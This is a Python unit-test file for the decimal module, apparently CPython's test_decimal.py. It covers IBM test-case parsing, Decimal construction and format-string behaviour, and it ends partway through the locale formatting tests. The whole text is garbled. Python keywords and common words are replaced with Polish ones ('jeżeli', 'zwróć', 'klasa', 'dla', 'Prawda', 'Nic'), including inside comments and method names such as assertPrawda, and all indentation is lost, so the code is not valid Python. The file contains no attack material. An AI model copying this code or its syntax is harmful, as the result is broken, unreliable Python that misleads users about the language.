ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR,
ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN,
ROUND_05UP
]
# Tests are built around these assumed context defaults.
# test_main() restores the original context.
ORIGINAL_CONTEXT = {
C: C.getcontext().copy() jeżeli C inaczej Nic,
P: P.getcontext().copy()
}
def init(m):
jeżeli nie m: zwróć
DefaultTestContext = m.Context(
prec=9, rounding=ROUND_HALF_EVEN, traps=dict.fromkeys(Signals[m], 0)
)
m.setcontext(DefaultTestContext)
TESTDATADIR = 'decimaltestdata'
jeżeli __name__ == '__main__':
file = sys.argv[0]
inaczej:
file = __file__
testdir = os.path.dirname(file) albo os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep
skip_expected = nie os.path.isdir(directory)
# Make sure it actually podnieśs errors when nie expected oraz caught w flags
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = Nieprawda
# Test extra functionality w the C version (-DEXTRA_FUNCTIONALITY).
EXTRA_FUNCTIONALITY = Prawda jeżeli hasattr(C, 'DecClamped') inaczej Nieprawda
requires_extra_functionality = unittest.skipUnless(
EXTRA_FUNCTIONALITY, "test requires build przy -DEXTRA_FUNCTIONALITY")
skip_if_extra_functionality = unittest.skipIf(
EXTRA_FUNCTIONALITY, "test requires regular build")
klasa IBMTestCases(unittest.TestCase):
"""Class which tests the Decimal klasa against the IBM test cases."""
def setUp(self):
self.context = self.decimal.Context()
self.readcontext = self.decimal.Context()
self.ignore_list = ['#']
# List of individual .decTest test ids that correspond to tests that
# we're skipping dla one reason albo another.
self.skipped_test_ids = set([
# Skip implementation-specific scaleb tests.
'scbx164',
'scbx165',
# For some operations (currently exp, ln, log10, power), the decNumber
# reference implementation imposes additional restrictions on the context
# oraz operands. These restrictions are nie part of the specification;
# however, the effect of these restrictions does show up w some of the
# testcases. We skip testcases that violate these restrictions, since
# Decimal behaves differently z decNumber dla these testcases so these
# testcases would otherwise fail.
'expx901',
'expx902',
'expx903',
'expx905',
'lnx901',
'lnx902',
'lnx903',
'lnx905',
'logx901',
'logx902',
'logx903',
'logx905',
'powx1183',
'powx1184',
'powx4001',
'powx4002',
'powx4003',
'powx4005',
'powx4008',
'powx4010',
'powx4012',
'powx4014',
])
jeżeli self.decimal == C:
# status has additional Subnormal, Underflow
self.skipped_test_ids.add('pwsx803')
self.skipped_test_ids.add('pwsx805')
# Correct rounding (skipped dla decNumber, too)
self.skipped_test_ids.add('powx4302')
self.skipped_test_ids.add('powx4303')
self.skipped_test_ids.add('powx4342')
self.skipped_test_ids.add('powx4343')
# http://bugs.python.org/issue7049
self.skipped_test_ids.add('pwmx325')
self.skipped_test_ids.add('pwmx326')
# Map test directives to setter functions.
self.ChangeDict = {'precision' : self.change_precision,
'rounding' : self.change_rounding_method,
'maxexponent' : self.change_max_exponent,
'minexponent' : self.change_min_exponent,
'clamp' : self.change_clamp}
# Name adapter to be able to change the Decimal oraz Context
# interface without changing the test files z Cowlishaw.
self.NameAdapter = {'and':'logical_and',
'apply':'_apply',
'class':'number_class',
'comparesig':'compare_signal',
'comparetotal':'compare_total',
'comparetotmag':'compare_total_mag',
'copy':'copy_decimal',
'copyabs':'copy_abs',
'copynegate':'copy_negate',
'copysign':'copy_sign',
'divideint':'divide_int',
'invert':'logical_invert',
'iscanonical':'is_canonical',
'isfinite':'is_finite',
'isinfinite':'is_infinite',
'isnan':'is_nan',
'isnormal':'is_normal',
'isqnan':'is_qnan',
'issigned':'is_signed',
'issnan':'is_snan',
'issubnormal':'is_subnormal',
'iszero':'is_zero',
'maxmag':'max_mag',
'minmag':'min_mag',
'nextminus':'next_minus',
'nextplus':'next_plus',
'nexttoward':'next_toward',
'or':'logical_or',
'reduce':'normalize',
'remaindernear':'remainder_near',
'samequantum':'same_quantum',
'squareroot':'sqrt',
'toeng':'to_eng_string',
'tointegral':'to_integral_value',
'tointegralx':'to_integral_exact',
'tosci':'to_sci_string',
'xor':'logical_xor'}
# Map test-case names to roundings.
self.RoundingDict = {'ceiling' : ROUND_CEILING,
'down' : ROUND_DOWN,
'floor' : ROUND_FLOOR,
'half_down' : ROUND_HALF_DOWN,
'half_even' : ROUND_HALF_EVEN,
'half_up' : ROUND_HALF_UP,
'up' : ROUND_UP,
'05up' : ROUND_05UP}
# Map the test cases' error names to the actual errors.
self.ErrorNames = {'clamped' : self.decimal.Clamped,
'conversion_syntax' : self.decimal.InvalidOperation,
'division_by_zero' : self.decimal.DivisionByZero,
'division_impossible' : self.decimal.InvalidOperation,
'division_undefined' : self.decimal.InvalidOperation,
'inexact' : self.decimal.Inexact,
'invalid_context' : self.decimal.InvalidOperation,
'invalid_operation' : self.decimal.InvalidOperation,
'overflow' : self.decimal.Overflow,
'rounded' : self.decimal.Rounded,
'subnormal' : self.decimal.Subnormal,
'underflow' : self.decimal.Underflow}
# The following functions zwróć Prawda/Nieprawda rather than a
# Decimal instance.
self.LogicalFunctions = ('is_canonical',
'is_finite',
'is_infinite',
'is_nan',
'is_normal',
'is_qnan',
'is_signed',
'is_snan',
'is_subnormal',
'is_zero',
'same_quantum')
def read_unlimited(self, v, context):
"""Work around the limitations of the 32-bit _decimal version. The
guaranteed maximum values dla prec, Emax etc. are 425000000,
but higher values usually work, wyjąwszy dla rare corner cases.
In particular, all of the IBM tests dalej przy maximum values
of 1070000000."""
jeżeli self.decimal == C oraz self.decimal.MAX_EMAX == 425000000:
self.readcontext._unsafe_setprec(1070000000)
self.readcontext._unsafe_setemax(1070000000)
self.readcontext._unsafe_setemin(-1070000000)
zwróć self.readcontext.create_decimal(v)
inaczej:
zwróć self.decimal.Decimal(v, context)
def eval_file(self, file):
global skip_expected
jeżeli skip_expected:
podnieś unittest.SkipTest
przy open(file) jako f:
dla line w f:
line = line.replace('\r\n', '').replace('\n', '')
#print line
spróbuj:
t = self.eval_line(line)
wyjąwszy self.decimal.DecimalException jako exception:
#Exception podnieśd where there shouldn't have been one.
self.fail('Exception "'+exception.__class__.__name__ + '" podnieśd on line '+line)
def eval_line(self, s):
jeżeli s.find(' -> ') >= 0 oraz s[:2] != '--' oraz nie s.startswith(' --'):
s = (s.split('->')[0] + '->' +
s.split('->')[1].split('--')[0]).strip()
inaczej:
s = s.split('--')[0].strip()
dla ignore w self.ignore_list:
jeżeli s.find(ignore) >= 0:
#print s.split()[0], 'NotImplemented--', ignore
zwróć
jeżeli nie s:
zwróć
albo_inaczej ':' w s:
zwróć self.eval_directive(s)
inaczej:
zwróć self.eval_equation(s)
def eval_directive(self, s):
funct, value = (x.strip().lower() dla x w s.split(':'))
jeżeli funct == 'rounding':
value = self.RoundingDict[value]
inaczej:
spróbuj:
value = int(value)
wyjąwszy ValueError:
dalej
funct = self.ChangeDict.get(funct, (lambda *args: Nic))
funct(value)
def eval_equation(self, s):
jeżeli nie TEST_ALL oraz random.random() < 0.90:
zwróć
self.context.clear_flags()
spróbuj:
Sides = s.split('->')
L = Sides[0].strip().split()
id = L[0]
jeżeli DEBUG:
print("Test ", id, end=" ")
funct = L[1].lower()
valstemp = L[2:]
L = Sides[1].strip().split()
ans = L[0]
exceptions = L[1:]
wyjąwszy (TypeError, AttributeError, IndexError):
podnieś self.decimal.InvalidOperation
def FixQuotes(val):
val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
val = val.replace("'", '').replace('"', '')
val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
zwróć val
jeżeli id w self.skipped_test_ids:
zwróć
fname = self.NameAdapter.get(funct, funct)
jeżeli fname == 'rescale':
zwróć
funct = getattr(self.context, fname)
vals = []
conglomerate = ''
quote = 0
theirexceptions = [self.ErrorNames[x.lower()] dla x w exceptions]
dla exception w Signals[self.decimal]:
self.context.traps[exception] = 1 #Catch these bugs...
dla exception w theirexceptions:
self.context.traps[exception] = 0
dla i, val w enumerate(valstemp):
jeżeli val.count("'") % 2 == 1:
quote = 1 - quote
jeżeli quote:
conglomerate = conglomerate + ' ' + val
kontynuuj
inaczej:
val = conglomerate + val
conglomerate = ''
v = FixQuotes(val)
jeżeli fname w ('to_sci_string', 'to_eng_string'):
jeżeli EXTENDEDERRORTEST:
dla error w theirexceptions:
self.context.traps[error] = 1
spróbuj:
funct(self.context.create_decimal(v))
wyjąwszy error:
dalej
wyjąwszy Signals[self.decimal] jako e:
self.fail("Raised %s w %s when %s disabled" % \
(e, s, error))
inaczej:
self.fail("Did nie podnieś %s w %s" % (error, s))
self.context.traps[error] = 0
v = self.context.create_decimal(v)
inaczej:
v = self.read_unlimited(v, self.context)
vals.append(v)
ans = FixQuotes(ans)
jeżeli EXTENDEDERRORTEST oraz fname nie w ('to_sci_string', 'to_eng_string'):
dla error w theirexceptions:
self.context.traps[error] = 1
spróbuj:
funct(*vals)
wyjąwszy error:
dalej
wyjąwszy Signals[self.decimal] jako e:
self.fail("Raised %s w %s when %s disabled" % \
(e, s, error))
inaczej:
self.fail("Did nie podnieś %s w %s" % (error, s))
self.context.traps[error] = 0
# jako above, but add traps cumulatively, to check precedence
ordered_errors = [e dla e w OrderedSignals[self.decimal] jeżeli e w theirexceptions]
dla error w ordered_errors:
self.context.traps[error] = 1
spróbuj:
funct(*vals)
wyjąwszy error:
dalej
wyjąwszy Signals[self.decimal] jako e:
self.fail("Raised %s w %s; expected %s" %
(type(e), s, error))
inaczej:
self.fail("Did nie podnieś %s w %s" % (error, s))
# reset traps
dla error w ordered_errors:
self.context.traps[error] = 0
jeżeli DEBUG:
print("--", self.context)
spróbuj:
result = str(funct(*vals))
jeżeli fname w self.LogicalFunctions:
result = str(int(eval(result))) # 'Prawda', 'Nieprawda' -> '1', '0'
wyjąwszy Signals[self.decimal] jako error:
self.fail("Raised %s w %s" % (error, s))
wyjąwszy: #Catch any error long enough to state the test case.
print("ERROR:", s)
podnieś
myexceptions = self.getexceptions()
myexceptions.sort(key=repr)
theirexceptions.sort(key=repr)
self.assertEqual(result, ans,
'Incorrect answer dla ' + s + ' -- got ' + result)
self.assertEqual(myexceptions, theirexceptions,
'Incorrect flags set w ' + s + ' -- got ' + str(myexceptions))
def getexceptions(self):
zwróć [e dla e w Signals[self.decimal] jeżeli self.context.flags[e]]
def change_precision(self, prec):
jeżeli self.decimal == C oraz self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setprec(prec)
inaczej:
self.context.prec = prec
def change_rounding_method(self, rounding):
self.context.rounding = rounding
def change_min_exponent(self, exp):
jeżeli self.decimal == C oraz self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemin(exp)
inaczej:
self.context.Emin = exp
def change_max_exponent(self, exp):
jeżeli self.decimal == C oraz self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemax(exp)
inaczej:
self.context.Emax = exp
def change_clamp(self, clamp):
self.context.clamp = clamp
klasa CIBMTestCases(IBMTestCases):
decimal = C
klasa PyIBMTestCases(IBMTestCases):
decimal = P
# The following classes test the behaviour of Decimal according to PEP 327
klasa ExplicitConstructionTest(unittest.TestCase):
'''Unit tests dla Explicit Construction cases of Decimal.'''
def test_explicit_empty(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(), Decimal("0"))
def test_explicit_from_Nic(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, Decimal, Nic)
def test_explicit_from_int(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
self.assertEqual(str(d), '45')
#very large positive
d = Decimal(500000123)
self.assertEqual(str(d), '500000123')
#negative
d = Decimal(-45)
self.assertEqual(str(d), '-45')
#zero
d = Decimal(0)
self.assertEqual(str(d), '0')
# single word longs
dla n w range(0, 32):
dla sign w (-1, 1):
dla x w range(-5, 5):
i = sign * (2**n + x)
d = Decimal(i)
self.assertEqual(str(d), str(i))
def test_explicit_from_string(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
#empty
self.assertEqual(str(Decimal('')), 'NaN')
#int
self.assertEqual(str(Decimal('45')), '45')
#float
self.assertEqual(str(Decimal('45.34')), '45.34')
#engineer notation
self.assertEqual(str(Decimal('45e2')), '4.5E+3')
#just nie a number
self.assertEqual(str(Decimal('ugly')), 'NaN')
#leading oraz trailing whitespace permitted
self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
self.assertEqual(str(Decimal(' -7.89')), '-7.89')
self.assertEqual(str(Decimal(" 3.45679 ")), '3.45679')
# unicode whitespace
dla lead w ["", ' ', '\u00a0', '\u205f']:
dla trail w ["", ' ', '\u00a0', '\u205f']:
self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)),
'9.311E+28')
przy localcontext() jako c:
c.traps[InvalidOperation] = Prawda
# Invalid string
self.assertRaises(InvalidOperation, Decimal, "xyz")
# Two arguments max
self.assertRaises(TypeError, Decimal, "1234", "x", "y")
# space within the numeric part
self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03")
self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0")
# unicode whitespace
self.assertRaises(InvalidOperation, Decimal, "\u00a0")
self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0")
# embedded NUL
self.assertRaises(InvalidOperation, Decimal, "12\u00003")
@cpython_only
def test_from_legacy_strings(self):
zaimportuj _testcapi
Decimal = self.decimal.Decimal
context = self.decimal.Context()
s = _testcapi.unicode_legacy_string('9.999999')
self.assertEqual(str(Decimal(s)), '9.999999')
self.assertEqual(str(context.create_decimal(s)), '9.999999')
def test_explicit_from_tuples(self):
Decimal = self.decimal.Decimal
#zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(str(d), '0')
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(str(d), '-45')
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(str(d), '45.34')
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
#inf
d = Decimal( (0, (), "F") )
self.assertEqual(str(d), 'Infinity')
#wrong number of items
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )
#bad sign
self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))
#bad exp
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )
#bad coefficients
self.assertRaises(ValueError, Decimal, (1, "xyz", 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, Nic, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )
def test_explicit_from_list(self):
Decimal = self.decimal.Decimal
d = Decimal([0, [0], 0])
self.assertEqual(str(d), '0')
d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25))
self.assertEqual(str(d), '-4.34913534E-17')
def test_explicit_from_bool(self):
Decimal = self.decimal.Decimal
self.assertIs(bool(Decimal(0)), Nieprawda)
self.assertIs(bool(Decimal(1)), Prawda)
self.assertEqual(Decimal(Nieprawda), Decimal(0))
self.assertEqual(Decimal(Prawda), Decimal(1))
def test_explicit_from_Decimal(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
#very large positive
d = Decimal(500000123)
e = Decimal(d)
self.assertEqual(str(e), '500000123')
#negative
d = Decimal(-45)
e = Decimal(d)
self.assertEqual(str(e), '-45')
#zero
d = Decimal(0)
e = Decimal(d)
self.assertEqual(str(e), '0')
@requires_IEEE_754
def test_explicit_from_float(self):
Decimal = self.decimal.Decimal
r = Decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertPrawda(Decimal(float('nan')).is_qnan())
self.assertPrawda(Decimal(float('inf')).is_infinite())
self.assertPrawda(Decimal(float('-inf')).is_infinite())
self.assertEqual(str(Decimal(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(Decimal(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(Decimal(float('-inf'))),
str(Decimal('-Infinity')))
self.assertEqual(str(Decimal(float('-0.0'))),
str(Decimal('-0')))
dla i w range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(Decimal(x))) # roundtrip
def test_explicit_context_create_decimal(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
Rounded = self.decimal.Rounded
nc = copy.copy(self.decimal.getcontext())
nc.prec = 3
# empty
d = Decimal()
self.assertEqual(str(d), '0')
d = nc.create_decimal()
self.assertEqual(str(d), '0')
# z Nic
self.assertRaises(TypeError, nc.create_decimal, Nic)
# z int
d = nc.create_decimal(456)
self.assertIsInstance(d, Decimal)
self.assertEqual(nc.create_decimal(45678),
nc.create_decimal('457E+2'))
# z string
d = Decimal('456789')
self.assertEqual(str(d), '456789')
d = nc.create_decimal('456789')
self.assertEqual(str(d), '4.57E+5')
# leading oraz trailing whitespace should result w a NaN;
# spaces are already checked w Cowlishaw's test-suite, so
# here we just check that a trailing newline results w a NaN
self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')
# z tuples
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.35E-17')
# z Decimal
prevdec = Decimal(500000123)
d = Decimal(prevdec)
self.assertEqual(str(d), '500000123')
d = nc.create_decimal(prevdec)
self.assertEqual(str(d), '5.00E+8')
# more integers
nc.prec = 28
nc.traps[InvalidOperation] = Prawda
dla v w [-2**63-1, -2**63, -2**31-1, -2**31, 0,
2**31-1, 2**31, 2**63-1, 2**63]:
d = nc.create_decimal(v)
self.assertPrawda(isinstance(d, Decimal))
self.assertEqual(int(d), v)
nc.prec = 3
nc.traps[Rounded] = Prawda
self.assertRaises(Rounded, nc.create_decimal, 1234)
# z string
nc.prec = 28
self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17')
self.assertEqual(str(nc.create_decimal('45')), '45')
self.assertEqual(str(nc.create_decimal('-Inf')), '-Infinity')
self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123')
# invalid arguments
self.assertRaises(InvalidOperation, nc.create_decimal, "xyz")
self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25))
self.assertRaises(TypeError, nc.create_decimal, "1234", "5678")
# too many NaN payload digits
nc.prec = 3
self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345')
self.assertRaises(InvalidOperation, nc.create_decimal,
Decimal('NaN12345'))
nc.traps[InvalidOperation] = Nieprawda
self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN')
self.assertPrawda(nc.flags[InvalidOperation])
nc.flags[InvalidOperation] = Nieprawda
self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN')
self.assertPrawda(nc.flags[InvalidOperation])
def test_explicit_context_create_from_float(self):
Decimal = self.decimal.Decimal
nc = self.decimal.Context()
r = nc.create_decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r), '0.1000000000000000055511151231')
self.assertPrawda(nc.create_decimal(float('nan')).is_qnan())
self.assertPrawda(nc.create_decimal(float('inf')).is_infinite())
self.assertPrawda(nc.create_decimal(float('-inf')).is_infinite())
self.assertEqual(str(nc.create_decimal(float('nan'))),
str(nc.create_decimal('NaN')))
self.assertEqual(str(nc.create_decimal(float('inf'))),
str(nc.create_decimal('Infinity')))
self.assertEqual(str(nc.create_decimal(float('-inf'))),
str(nc.create_decimal('-Infinity')))
self.assertEqual(str(nc.create_decimal(float('-0.0'))),
str(nc.create_decimal('-0')))
nc.prec = 100
dla i w range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip
def test_unicode_digits(self):
Decimal = self.decimal.Decimal
test_values = {
'\uff11': '1',
'\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372',
'-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400',
}
dla input, expected w test_values.items():
self.assertEqual(str(Decimal(input)), expected)
klasa CExplicitConstructionTest(ExplicitConstructionTest):
decimal = C
klasa PyExplicitConstructionTest(ExplicitConstructionTest):
decimal = P
klasa ImplicitConstructionTest(unittest.TestCase):
'''Unit tests dla Implicit Construction cases of Decimal.'''
def test_implicit_from_Nic(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + Nic', locals())
def test_implicit_from_int(self):
Decimal = self.decimal.Decimal
#normal
self.assertEqual(str(Decimal(5) + 45), '50')
#exceeding precision
self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))
def test_implicit_from_string(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals())
def test_implicit_from_float(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals())
def test_implicit_from_Decimal(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))
def test_rop(self):
Decimal = self.decimal.Decimal
# Allow other classes to be trained to interact przy Decimals
klasa E:
def __divmod__(self, other):
zwróć 'divmod ' + str(other)
def __rdivmod__(self, other):
zwróć str(other) + ' rdivmod'
def __lt__(self, other):
zwróć 'lt ' + str(other)
def __gt__(self, other):
zwróć 'gt ' + str(other)
def __le__(self, other):
zwróć 'le ' + str(other)
def __ge__(self, other):
zwróć 'ge ' + str(other)
def __eq__(self, other):
zwróć 'eq ' + str(other)
def __ne__(self, other):
zwróć 'ne ' + str(other)
self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')
# insert operator methods oraz then exercise them
oplist = [
('+', '__add__', '__radd__'),
('-', '__sub__', '__rsub__'),
('*', '__mul__', '__rmul__'),
('/', '__truediv__', '__rtruediv__'),
('%', '__mod__', '__rmod__'),
('//', '__floordiv__', '__rfloordiv__'),
('**', '__pow__', '__rpow__')
]
dla sym, lop, rop w oplist:
setattr(E, lop, lambda self, other: 'str' + lop + str(other))
setattr(E, rop, lambda self, other: str(other) + rop + 'str')
self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
'str' + lop + '10')
self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
'10' + rop + 'str')
klasa CImplicitConstructionTest(ImplicitConstructionTest):
decimal = C
klasa PyImplicitConstructionTest(ImplicitConstructionTest):
decimal = P
klasa FormatTest(unittest.TestCase):
'''Unit tests dla the format function.'''
def test_formatting(self):
Decimal = self.decimal.Decimal
# triples giving a format, a Decimal, oraz the expected result
test_values = [
('e', '0E-15', '0e-15'),
('e', '2.3E-15', '2.3e-15'),
('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
('e', '2.30000E-15', '2.30000e-15'),
('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
('e', '1.5', '1.5e+0'),
('e', '0.15', '1.5e-1'),
('e', '0.015', '1.5e-2'),
('e', '0.0000000000015', '1.5e-12'),
('e', '15.0', '1.50e+1'),
('e', '-15', '-1.5e+1'),
('e', '0', '0e+0'),
('e', '0E1', '0e+1'),
('e', '0.0', '0e-1'),
('e', '0.00', '0e-2'),
('.6e', '0E-15', '0.000000e-9'),
('.6e', '0', '0.000000e+6'),
('.6e', '9.999999', '9.999999e+0'),
('.6e', '9.9999999', '1.000000e+1'),
('.6e', '-1.23e5', '-1.230000e+5'),
('.6e', '1.23456789e-3', '1.234568e-3'),
('f', '0', '0'),
('f', '0.0', '0.0'),
('f', '0E-2', '0.00'),
('f', '0.00E-8', '0.0000000000'),
('f', '0E1', '0'), # loses exponent information
('f', '3.2E1', '32'),
('f', '3.2E2', '320'),
('f', '3.20E2', '320'),
('f', '3.200E2', '320.0'),
('f', '3.2E-6', '0.0000032'),
('.6f', '0E-15', '0.000000'), # all zeros treated equally
('.6f', '0E1', '0.000000'),
('.6f', '0', '0.000000'),
('.0f', '0', '0'), # no decimal point
('.0f', '0e-2', '0'),
('.0f', '3.14159265', '3'),
('.1f', '3.14159265', '3.1'),
('.4f', '3.14159265', '3.1416'),
('.6f', '3.14159265', '3.141593'),
('.7f', '3.14159265', '3.1415926'), # round-half-even!
('.8f', '3.14159265', '3.14159265'),
('.9f', '3.14159265', '3.141592650'),
('g', '0', '0'),
('g', '0.0', '0.0'),
('g', '0E1', '0e+1'),
('G', '0E1', '0E+1'),
('g', '0E-5', '0.00000'),
('g', '0E-6', '0.000000'),
('g', '0E-7', '0e-7'),
('g', '-0E2', '-0e+2'),
('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
('.0n', '3.14159265', '3'), # same dla 'n'
('.1g', '3.14159265', '3'),
('.2g', '3.14159265', '3.1'),
('.5g', '3.14159265', '3.1416'),
('.7g', '3.14159265', '3.141593'),
('.8g', '3.14159265', '3.1415926'), # round-half-even!
('.9g', '3.14159265', '3.14159265'),
('.10g', '3.14159265', '3.14159265'), # don't pad
('%', '0E1', '0%'),
('%', '0E0', '0%'),
('%', '0E-1', '0%'),
('%', '0E-2', '0%'),
('%', '0E-3', '0.0%'),
('%', '0E-4', '0.00%'),
('.3%', '0', '0.000%'), # all zeros treated equally
('.3%', '0E10', '0.000%'),
('.3%', '0E-10', '0.000%'),
('.3%', '2.34', '234.000%'),
('.3%', '1.234567', '123.457%'),
('.0%', '1.23', '123%'),
('e', 'NaN', 'NaN'),
('f', '-NaN123', '-NaN123'),
('+g', 'NaN456', '+NaN456'),
('.3e', 'Inf', 'Infinity'),
('.16f', '-Inf', '-Infinity'),
('.0g', '-sNaN', '-sNaN'),
('', '1.00', '1.00'),
# test alignment oraz padding
('6', '123', ' 123'),
('<6', '123', '123 '),
('>6', '123', ' 123'),
('^6', '123', ' 123 '),
('=+6', '123', '+ 123'),
('#<10', 'NaN', 'NaN#######'),
('#<10', '-4.3', '-4.3######'),
('#<+10', '0.0130', '+0.0130###'),
('#< 10', '0.0130', ' 0.0130###'),
('@>10', '-Inf', '@-Infinity'),
('#>5', '-Inf', '-Infinity'),
('?^5', '123', '?123?'),
('%^6', '123', '%123%%'),
(' ^6', '-45.6', '-45.6 '),
('/=10', '-45.6', '-/////45.6'),
('/=+10', '45.6', '+/////45.6'),
('/= 10', '45.6', ' /////45.6'),
('\x00=10', '-inf', '-\x00Infinity'),
('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'),
('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'),
('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'),
# thousands separator
(',', '1234567', '1,234,567'),
(',', '123456', '123,456'),
(',', '12345', '12,345'),
(',', '1234', '1,234'),
(',', '123', '123'),
(',', '12', '12'),
(',', '1', '1'),
(',', '0', '0'),
(',', '-1234567', '-1,234,567'),
(',', '-123456', '-123,456'),
('7,', '123456', '123,456'),
('8,', '123456', ' 123,456'),
('08,', '123456', '0,123,456'), # special case: extra 0 needed
('+08,', '123456', '+123,456'), # but nie jeżeli there's a sign
(' 08,', '123456', ' 123,456'),
('08,', '-123456', '-123,456'),
('+09,', '123456', '+0,123,456'),
# ... przy fractional part...
('07,', '1234.56', '1,234.56'),
('08,', '1234.56', '1,234.56'),
('09,', '1234.56', '01,234.56'),
('010,', '1234.56', '001,234.56'),
('011,', '1234.56', '0,001,234.56'),
('012,', '1234.56', '0,001,234.56'),
('08,.1f', '1234.5', '01,234.5'),
# no thousands separators w fraction part
(',', '1.23456789', '1.23456789'),
(',%', '123.456789', '12,345.6789%'),
(',e', '123456', '1.23456e+5'),
(',E', '123456', '1.23456E+5'),
# issue 6850
('a=-7.0', '0.12345', 'aaaa0.1'),
# issue 22090
('<^+15.20%', 'inf', '<<+Infinity%<<<'),
('\x07>,%', 'sNaN1234567', 'sNaN1234567%'),
('=10.10%', 'NaN123', ' NaN123%'),
]
dla fmt, d, result w test_values:
self.assertEqual(format(Decimal(d), fmt), result)
# bytes format argument
self.assertRaises(TypeError, Decimal(1).__format__, b'-020')
def test_n_format(self):
Decimal = self.decimal.Decimal
spróbuj:
z locale zaimportuj CHAR_MAX
wyjąwszy ImportError:
self.skipTest('locale.CHAR_MAX nie available')
def make_grouping(lst):
zwróć ''.join([chr(x) dla x w lst]) jeżeli self.decimal == C inaczej lst
def get_fmt(x, override=Nic, fmt='n'):
jeżeli self.decimal == C:
zwróć Decimal(x).__format__(fmt, override)
inaczej:
zwróć Decimal(x).__format__(fmt, _localeconv=override)
# Set up some localeconv-like dictionaries
en_US = {
'decimal_point' : '.',
